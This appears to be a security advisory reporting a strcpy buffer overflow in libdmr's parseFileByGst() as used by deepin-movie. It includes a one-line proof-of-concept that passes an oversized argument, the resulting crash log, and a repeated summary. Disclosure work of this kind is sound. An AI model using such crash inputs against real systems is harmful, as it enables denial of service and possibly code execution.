Summary
parseFileByGst() function in libdmr copies the url provided as an argument to a fixed size buffer using strcpy. If a url longer than the fixed buffer size was provided, the buffer will overflow.
PoC
$ deepin-movie $(python3 -c 'print("A"*1024)')
log path: "/home/u32i/.cache/deepin/deepin-movie/deepin-movie.log"
No appenders assotiated with category qt.qpa.xcb
[Warning] <> QXcbConnection: XCB error: 5 (BadAtom), sequence: 402, resource id: 0, major code: 20 (GetProperty), minor code: 0
*** buffer overflow detected ***: terminated
AbortedImpact
A successful explitation of this vulnerability will result in an application level DoS or could result in a remote code execution.
u32i Reporter
Summary
parseFileByGst()function in libdmr copies the url provided as an argument to a fixed size buffer usingstrcpy. If a url longer than the fixed buffer size was provided, the buffer will overflow.PoC
Impact
A successful explitation of this vulnerability will result in an application level DoS or could result in a remote code execution.